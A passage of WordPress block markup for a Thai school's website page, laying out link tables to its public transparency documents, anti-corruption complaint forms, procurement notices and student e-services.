\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleL